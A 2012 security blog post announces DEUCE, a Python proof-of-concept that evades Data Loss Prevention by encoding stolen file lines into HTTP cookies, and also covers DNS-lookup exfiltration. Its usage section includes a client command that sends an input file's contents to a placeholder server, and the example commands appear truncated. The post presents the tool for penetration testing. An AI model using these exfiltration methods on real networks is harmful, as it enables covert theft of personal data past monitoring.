Wednesday, July 18, 2012

DEUCE: Bypassing DLP with Cookies

In a recent B-sides event, there was a talk about the exfiltration of data and Data Loss Prevention (DLP) systems. A known vector to bypass DLP, is the use of NSLookup. The attacker requests a domain he controls but adds a hostname that contains the data that needs to be sent outside the controlled environment. This means if an attacker wanted to steal a name and social security number he would request “” This request would hit the DNS server and be logged thus creating a list of identities for the attacker to mine at a later time.  The maximum limit is 255 characters for this kind of attack. This concept got me thinking what about a standard GET request such as this would make life easier for the attacker. He would no longer need to control the DNS server; he would just need to see what pages were requested. We would still be limited by the character maximum and each request could be easily logged and analyzed by proxies or alerting systems.  But, let’s be honest most DLP systems are going to alert on these types of requests, or at least they should.

After some dialog with some friends, it was pointed out that using cookies would be a great alternative. Cookies aren’t normally logged by proxies or other systems. Also if the cookie was encoded or encrypted, as they normally are it would keep the DLP and prying eyes at bay.  As an added benefit we are no longer limited by the 255 character maximum and one request could send many cookies.  

This led to the need to create a tool to test this concept. Enter Data Exfiltration Using Cookie Encryption or DEUCE. DEUCE went from simple concept to a multi-encoding and encryption DLP bypass tool. The program simply takes an input file and creates a cookie for each line.  DEUCE has the ability to encrypt via AES, hash with MD5 or use a custom multi-encode with a 3 times replacement cipher.  The program then sends its data to the server, where the AES and multi-encoded options are automatically converted back to plain text. The MD5 is a one way hash that would need to be cracked. However, if an attacker sent a list of social security numbers it would only take minutes to crack the 9 digits number using a tool like Hashcat. In the Python code you can change the name of the cookie, just make sure you change it in the client and the server.

DEUCE is written in python but could easily be converted to an executable using py2exe or PyInstaller also the AES encryption relies on PyCrypto. Because this is just a proof of concept tool DEUCE does not currently support SSL, but it may in the future.

Using DEUCE is simple. By default the server listens on all interfaces and on port 80. The DEUCE client has more options such as encryption and encoding methods, target URL and input file. Example usage below: 

  • python -o ouput.txt
    • This starts the listening server on all interfaces on port 80 with the output being output.txt
  • python -u http://location_of_deuce_server  -i inputfile.txt -m
    • This starts the DEUCE client and sends all data in the input file to http://location_of_deuce_server using the -m tells DEUCE to use multi-encode mode.

Please feel free to test this concept in your environment; obviously I do not have access to every possible solution out there. It is important to note I am in no way responsible for how you use DEUCE. This tool is designed to help penetration testers and assist users in testing their DLP implementation. You are not permitted to use DEUCE for any illegal means.

Thanks to Brandon Knight (@kaospunk) for the cookie idea and Jake Garlie (@_Jagar_) for listening to me rant about this.



No comments:

Post a Comment